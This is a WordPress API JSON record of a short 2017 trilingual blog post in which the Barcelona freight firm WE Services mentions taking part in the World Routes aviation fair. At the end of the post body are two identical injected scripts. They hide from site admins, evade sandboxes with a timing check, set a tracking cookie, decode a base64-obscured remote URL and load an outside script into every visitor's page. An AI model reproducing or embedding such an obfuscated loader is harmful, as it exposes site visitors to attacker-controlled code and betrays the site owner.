{"id":1228,"date":"2017-09-28T19:30:27","date_gmt":"2017-09-28T17:30:27","guid":{"rendered":"http:\/\/www.weservices.es\/?p=1228"},"modified":"2026-04-27T10:16:43","modified_gmt":"2026-04-27T10:16:43","slug":"world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/","title":{"rendered":"[:es]WORLD ROUTES 2017, La fira d&#8217;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 &#8211; The world&#8217;s largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d&#8217;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:]"},"content":{"rendered":"<p>[:es]Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con importante presencia en la importaci\u00f3n de mercanc\u00edas para grandes consorcios aereos a nivel mundial.[:en]<span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Barcelona is once again the epicenter of the aviation world bringing together the aeronautical sector, and WE Services has the privilege of participate with an important presence importing goods for some of the most important companies at the sector worldwide.<br \/>\n<\/span><\/span>[:ca]<span id=\"result_box\" class=\"\" lang=\"ca\">Barcelona torna <span class=\"\">a ser l&#8217;<\/span>epicentre del m\u00f3n de l&#8217;aviaci\u00f3 congregant al sector aeron\u00e0utic, i WE Services t\u00e9 <span class=\"\">el privilegi<\/span> de participar amb important pres\u00e8ncia amb la importaci\u00f3 de mercaderies per a grans consorcis <span class=\"\">aeris<\/span> <span class=\"\">a nivell mundial.<\/span><\/span>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es]Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con importante presencia en la importaci\u00f3n de mercanc\u00edas para grandes consorcios aereos a nivel mundial.[:en]Barcelona is once again the epicenter of the aviation world bringing together the aeronautical sector, and WE Services [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1231,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]WORLD ROUTES 2017, La fira d&#039;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 - The world&#039;s largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d&#039;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:] - We Services<\/title>\n<meta name=\"description\" content=\"Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]WORLD ROUTES 2017, La fira d&#039;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 - The world&#039;s largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d&#039;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2017-09-28T17:30:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:16:43+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/\",\"url\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/\",\"name\":\"[:es]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 - The world's largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2017-09-28T17:30:27+00:00\",\"dateModified\":\"2026-04-27T10:16:43+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]WORLD ROUTES 2017, La fira d&#8217;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 &#8211; The world&#8217;s largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d&#8217;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 - The world's largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:] - We Services","description":"Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/","og_locale":"en_US","og_type":"article","og_title":"[:es]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 - The world's largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:] - We Services","og_description":"Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con","og_url":"https:\/\/weservices.es\/en\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/","og_site_name":"We Services","article_published_time":"2017-09-28T17:30:27+00:00","article_modified_time":"2026-04-27T10:16:43+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/","url":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/","name":"[:es]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 - The world's largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d'aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#primaryimage"},"thumbnailUrl":"","datePublished":"2017-09-28T17:30:27+00:00","dateModified":"2026-04-27T10:16:43+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"Barcelona vuelve a ser el epicentro del mundo de la aviaci\u00f3n congregando al sector aerona\u00fatico, y WE Services tiene el privilegio de participar con","breadcrumb":{"@id":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/world-routes-2017-la-fira-daviacio-comercial-mes-gran-del-mon-assalta-barcelona\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]WORLD ROUTES 2017, La fira d&#8217;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:en]WORLD ROUTES 2017 &#8211; The world&#8217;s largest commercial aviation event assaults Barcelona[:ca]WORLD ROUTES 2017, La fira d&#8217;aviaci\u00f3 comercial m\u00e9s gran del m\u00f3n assalta Barcelona[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1228"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1228"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1228\/revisions"}],"predecessor-version":[{"id":3169,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1228\/revisions\/3169"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}